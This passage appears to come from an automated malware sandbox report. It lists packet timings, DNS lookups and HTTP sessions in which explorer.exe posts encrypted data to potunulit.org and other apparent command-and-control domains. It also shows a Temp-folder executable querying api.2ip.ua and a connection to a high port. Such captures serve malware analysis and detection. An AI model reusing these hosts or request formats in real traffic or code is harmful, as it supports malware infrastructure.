Jan 25, 2023 09:28:21.408736944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408776999 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408795118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408838034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408879995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408925056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408942938 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408982038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408998966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409039974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409080982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409122944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409142017 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409183979 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409198999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409244061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409286976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409329891 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409365892 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409383059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409409046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409451008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409495115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409542084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409554958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409586906 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409611940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409652948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409697056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409744978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409756899 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409789085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409813881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409854889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409895897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409946918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.409960032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.409992933 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410018921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410063028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410105944 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410155058 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410166979 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410197973 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410224915 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410267115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410309076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410351038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410367966 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410414934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410428047 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410469055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410511017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410558939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410573006 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410604000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410630941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410675049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410736084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410782099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410800934 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410832882 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.410860062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410902977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410949945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.410999060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.411012888 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.411045074 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.411070108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.411111116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.411149979 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.411196947 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:23.142566919 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:23.652717113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:23.652717113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:23.670342922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:23.670407057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:23.730667114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:23.730778933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:23.730918884 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:23.928066015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:23.928066015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:23.945364952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:23.945425987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.007177114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.007241011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.008191109 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.350869894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.350869894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.368319988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.368372917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.433986902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.434051037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.435631037 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.653687000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.653789043 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.671227932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.671333075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.739021063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.739087105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.739207983 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.896620989 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.896682024 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:24.914218903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.914258957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.978197098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.978247881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:24.978393078 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:25.086702108 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:25.086779118 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:25.104079962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:25.104120970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:25.163672924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:25.163703918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:25.163815975 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:27.634155989 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:27.634207010 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:27.634294033 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:27.660188913 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:27.660232067 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:27.764058113 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:27.764229059 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:28.304316044 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:28.304378986 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:28.304995060 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:28.305099010 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:28.307185888 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:28.307218075 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:28.356259108 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:28.356347084 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:28.356442928 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:28.356442928 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:28.423815966 CET	49737	443	192.168.2.4	162.0.217.254
Jan 25, 2023 09:28:28.423867941 CET	443	49737	162.0.217.254	192.168.2.4
Jan 25, 2023 09:28:58.403656006 CET	49738	37538	192.168.2.4	89.208.103.88
Jan 25, 2023 09:28:58.426317930 CET	37538	49738	89.208.103.88	192.168.2.4
Jan 25, 2023 09:28:58.426871061 CET	49738	37538	192.168.2.4	89.208.103.88
Jan 25, 2023 09:28:58.881325960 CET	49738	37538	192.168.2.4	89.208.103.88
Jan 25, 2023 09:28:58.904421091 CET	37538	49738	89.208.103.88	192.168.2.4
Jan 25, 2023 09:28:58.981816053 CET	49738	37538	192.168.2.4	89.208.103.88
Jan 25, 2023 09:29:06.247607946 CET	49738	37538	192.168.2.4	89.208.103.88
Jan 25, 2023 09:29:06.271392107 CET	37538	49738	89.208.103.88	192.168.2.4
Jan 25, 2023 09:29:06.392040014 CET	49738	37538	192.168.2.4	89.208.103.88

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 09:28:11.521898031 CET	56807	53	192.168.2.4	8.8.8.8
Jan 25, 2023 09:28:11.545039892 CET	53	56807	8.8.8.8	192.168.2.4
Jan 25, 2023 09:28:27.594902039 CET	61007	53	192.168.2.4	8.8.8.8
Jan 25, 2023 09:28:27.617297888 CET	53	61007	8.8.8.8	192.168.2.4
Jan 25, 2023 09:28:29.245378017 CET	60686	53	192.168.2.4	8.8.8.8
Jan 25, 2023 09:28:29.266858101 CET	53	60686	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 25, 2023 09:28:11.521898031 CET	192.168.2.4	8.8.8.8	0xe307	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:27.594902039 CET	192.168.2.4	8.8.8.8	0xa725	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:29.245378017 CET	192.168.2.4	8.8.8.8	0x149b	Standard query (0)	gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 25, 2023 09:28:11.545039892 CET	8.8.8.8	192.168.2.4	0xe307	No error (0)	potunulit.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:11.545039892 CET	8.8.8.8	192.168.2.4	0xe307	No error (0)	potunulit.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:27.617297888 CET	8.8.8.8	192.168.2.4	0xa725	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:28:29.266858101 CET	8.8.8.8	192.168.2.4	0x149b	Name error (3)	gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

ryjphgb.com

potunulit.org

egqgnqk.org

aygtqn.org

fedface.com

pghirnwb.com

hkrpyqspb.net

jwoitvech.com

fedbh.net

fyugji.net

mlleyedksk.org

vjawtynvst.net

fyeyf.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49737	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\43D0.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49736	188.114.96.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 09:28:11.586745024 CET	365	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ryjphgb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: potunulit.org
Jan 25, 2023 09:28:11.586745977 CET	365	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9e a4 12 f9 Data Ascii: HO# *R.%]gmjC[jp_S61oJf=B!bO~1<BdJmJ<W[orO^C;j-DgGM
Jan 25, 2023 09:28:11.725743055 CET	365	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fih9XRZVfiHb6ul5lDe89E96SyIR%2B8f8Z05%2BaTBePa9Sxmz3Wr50lxG68ZyAwNwaaVf5qg7yvvxrt56vC4ZRnB%2BVkX4C8ZLJHmFe47CsFxNy%2FMwhQCasP1k3e6S1nuQU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa24c791e9b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a Data Ascii: 7=S
Jan 25, 2023 09:28:11.725814104 CET	366	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 25, 2023 09:28:11.739520073 CET	366	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://egqgnqk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: potunulit.org
Jan 25, 2023 09:28:11.739564896 CET	366	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 8b a7 1b d7 Data Ascii: HO# *R.%]gmjC[jp_S61oJf=B!bO`53!jiG!qd/zQ@Gs WJftTB-axw[vGc<4
Jan 25, 2023 09:28:11.821665049 CET	368	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EDSp5MowyujsafEdpguYy7bJLZ51FtpeE2S33L5xlU0bVdcA5%2FWFoCLEbpKtJiVcQ0MWs5QhCB%2FyebFjp4q%2Bup9lZsvFb0GjshaOPbMzOB1E%2F88CeRtfq9FSMzkt60gE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa24d6ab59b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 96 a5 d1 a6 8f 3a c7 cf 23 6a 3c 03 ff f9 e0 c0 64 6b 52 e1 32 c7 0d c9 f7 df c9 42 d2 09 e6 00 c6 04 25 76 13 21 82 77 a3 10 10 0f 50 0b 84 cd 01 1c 6d 4c 66 58 e8 1b 3d eb 35 ee de 80 0e 70 06 30 12 95 c5 c8 98 66 73 fd 10 68 f5 6b cc e3 bf 6c 13 d9 1e 1c 8d 79 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 54 53 51 3a 05 fc 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5c db c4 ff 13 13 bf 92 e4 92 24 08 4f c5 7c e7 cb a1 61 6e de f5 69 a9 18 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 04 38 7c 88 2c c8 48 69 70 c6 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 bf 78 f5 1a 0c 9b 4a d8 19 8e c8 4f 13 f6 80 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 c5 08 31 e5 98 90 f7 0f e4 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 47 c6 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 ee e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 27 af a1 90 4e b1 54 55 a5 7c b7 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 7c fc 04 f1 2c 4e af 03 5b 51 1d e4 a6 8b 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 d1 fe f3 94 0a 15 d7 ec 8a c3 e0 2b 59 b7 bb 01 7e 17 28 d2 04 45 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 47 9c 3c 21 c4 3a 96 9e c9 e7 17 3f dc e1 7e 4d a2 70 d4 03 45 af 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 de ab b6 5f 29 43 43 5f 56 03 62 18 2a 19 f8 40 ae ae 88 c1 76 a2 33 25 7d da a9 c3 e8 c8 2f Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG:#j<dkR2B%v!wPmLfX=5p0fshkly3Ob>!Z:V?sBTSQ:R+{Es\$O\|ani~_TzN,%Qa8\|,HipJlk?aMF$l3l9\|~qxJOLuVW;r#1n+Lc1<'i3FHGU}hU@Wt{9(B@w=fd0QpK'NTU\|o)2([T&}Wbyk\h\|,N[Qt9Pm+Y~(Ezk7@\G<!:?~MpEvn%.u#_)CC_Vb*@v3%}/
Jan 25, 2023 09:28:11.821738005 CET	369	IN	Data Raw: cb e2 09 e8 cb 23 1e 6c 36 ca 04 c1 6d 93 81 19 3b 07 bb 8c f5 38 93 52 b9 51 e8 9e 13 5e bb 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 79 53 64 11 2d 60 81 96 bb c0 2e 27 9d 6f 3a 42 56 7a de 9e 73 49 b0 65 a2 25 1f 78 60 38 30 5f d6 a6 Data Ascii: #l6m;8RQ^LEsCRZXySd-`.'o:BVzsIe%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eS
Jan 25, 2023 09:28:11.821789980 CET	370	IN	Data Raw: f8 7e 26 77 c1 9a bd 1c 17 e1 04 4d a8 61 96 16 88 81 ac 1f 2e a2 5a 70 5a 75 77 e7 b5 0a fc 1b 47 64 3e d7 b6 9a 3c bf 8b c2 3d fc e2 16 ac ad bc 89 e6 78 f1 10 34 9b f3 ca fe 68 27 c8 99 67 66 01 cb a3 d5 5b 5e 3d be e9 5b c5 64 a5 f6 57 51 d0 Data Ascii: ~&wMa.ZpZuwGd><=x4h'gf[^=[dWQV2.@vi()#O}yJj/0i2,Q=UVwT'~uOTtD;&1xDo{\lRVM~_]/3rK4d-Kl\i~CKb #
Jan 25, 2023 09:28:11.821837902 CET	372	IN	Data Raw: 7a 86 7e 37 c5 c5 84 50 37 36 d3 d3 30 8b b5 31 12 51 70 e4 22 8e 60 1b 75 5b 60 e1 7e d6 b2 1a 66 90 7d cd f0 29 b9 29 da fd 65 4f 84 b3 79 6d d7 ee 46 53 b2 c2 dc 5b 0f 15 49 c3 dd 41 0d 30 4f e1 75 49 31 55 de df 37 33 87 c4 ee ea 3d 65 38 21 Data Ascii: z~7P7601Qp"`u[`~f}))eOymFS[IA0OuI1U73=e8!ekg^]#vXM}E_3XLY?MHit?)XN\|C+Il$\|R-?ChF!$+<FsxzxP\|_*DRhSYuOLCR
Jan 25, 2023 09:28:11.821885109 CET	373	IN	Data Raw: b7 96 35 0a df 6c 09 0b b4 a8 95 62 1e 41 0b 30 fb b9 20 b3 c2 cd 6c 56 6e 2e 29 77 92 c8 2d fe 88 84 89 ad 80 42 a0 4c 8f d0 aa fa f0 79 fe 68 1e 9d 15 b3 6e 92 18 46 12 14 49 06 cf 4d 9d a4 91 1e f1 1f df bc 9d 21 55 6a e2 75 f3 12 7f 25 d2 9d Data Ascii: 5lbA0 lVn.)w-BLyhnFIM!Uju%q+TPCV;ez\RAVef8?%hI?_}[.;r<)*2op%PQh\Ewb})C~
Jan 25, 2023 09:28:11.821933985 CET	374	IN	Data Raw: 8d 0f 91 6c 1f a5 1f e5 37 cc 79 b1 b3 60 a9 03 34 04 34 8a e5 ce 25 1d 4d 77 16 b0 05 ad fa 7e 60 93 a6 d3 d4 6e 6d 1f 25 c7 8a b8 e3 81 66 02 10 c4 76 22 11 64 3a 1f 16 f6 83 be 56 d8 20 e9 90 da 4f 4a 9a 0a e4 6a 09 56 3a ac c4 d4 8c 99 bc 23 Data Ascii: l7y`44%Mw~`nm%fv"d:V OJjV:#^CyuahWg{ Esdo>Lpx$6X8^+1e-y%\a+V)fJr0D)E/pLJ7WL.9a:9C)2\|s1
Jan 25, 2023 09:28:11.821981907 CET	376	IN	Data Raw: 3f ed 0d 0b 0d 7e b2 72 3a 34 70 42 fb 7a 9f dd cb 59 f7 89 72 91 fe b0 4d a6 4e af f6 5b ca c5 4f 81 86 46 5b 04 db b8 3e 4d 33 8e 19 a4 a6 19 34 8a 1a 8f b9 ba 1b 76 93 ce 37 b7 6a 07 4f 47 f4 69 98 d6 9f 28 11 fb 97 b9 81 f3 73 5e 5b 43 ad b2 Data Ascii: ?~r:4pBzYrMN[OF[>M34v7jOGi(s^[ClcX2+wkpC[g7vvZjDEO~UV3TBQk[SM!27wYo/_[\=$?-5EC]wzx1Jxh~CGvt
Jan 25, 2023 09:28:11.822033882 CET	377	IN	Data Raw: 5c c9 fe d3 40 b3 59 af 71 a6 dc fa 35 4a 27 6f 2f f1 f4 71 04 e0 48 cf 51 84 dc e4 4b 6d 03 65 24 aa 8f 09 61 9c b8 4a 12 e5 70 d4 c4 16 8f ba 42 85 93 b5 d9 8f 63 ed bc 0c dd 71 55 6e 50 c6 0a 9a 7d 26 3f 70 45 35 c1 88 e4 a7 13 4e 55 66 5c 29 Data Ascii: \@Yq5J'o/qHQKme$aJpBcqUnP}&?pE5NUf\)1ppeV9;<8GTVD;n/U$CidhlPtAe6p}+d\|N<y^2yx 8M2ic@e40RG$!je@
Jan 25, 2023 09:28:11.822256088 CET	378	IN	Data Raw: 17 96 a0 13 73 3e 59 ad 06 b4 cf d8 7e 1a 55 bb 27 d0 06 be bc b0 86 99 ff d3 da e1 11 2b 3d cb 1e 51 3a 81 0f 9f 6e 30 d6 e1 1c 8c b9 01 2d 55 cc 4d 74 0b 9d 6b fd 1a df 5b c5 4d af 61 f7 0a 11 7c ae 5f e6 c6 51 7b 08 08 41 41 bd 17 52 83 aa 50 Data Ascii: s>Y~U'+=Q:n0-UMtk[Ma\|_Q{AARPQ}AwvbbyhU$xi"-ydZJe_9"bZvz\|F!O~:$`@1;G7/X,7<O1r5=s~r;H_$!i]H2GOsehJSb/V1
Jan 25, 2023 09:28:11.822305918 CET	380	IN	Data Raw: 38 89 b6 1d 1f e1 d8 ce a3 65 1c 9f 78 6d e9 32 6f f9 c9 80 7d 3a 97 fe 1c 2e 6f 5f ed 43 94 4e ff 3e f7 9c 55 6d 23 1e 8e 5f 01 81 32 a3 11 92 e0 05 da 56 70 8c d5 68 56 a0 8e 8a 66 b3 dc 6d 7c 1c 0b 03 c0 5e 05 9b 22 27 8f 78 56 f5 bd ff 85 18 Data Ascii: 8exm2o}:.o_CN>Um#_2VphVfm\|^"'xV;5>4GU@MRz=4Fm[\Jw%H(q;8/r+R,EN{&^mrGs;.#`:,'yJ{^!XYNiOD]]JhDChP
Jan 25, 2023 09:28:12.476766109 CET	802	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aygtqn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: potunulit.org
Jan 25, 2023 09:28:12.476815939 CET	803	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 ba 8a 14 62 cc d6 4f 96 f2 b6 10 ab Data Ascii: HO# R.%]gmjC[jp_S61oJf=B!bO9s9l7^7ap\&)yFC_"ksBd!9;pOVe3hODth!W,Q&"zR?`8ueju#Q
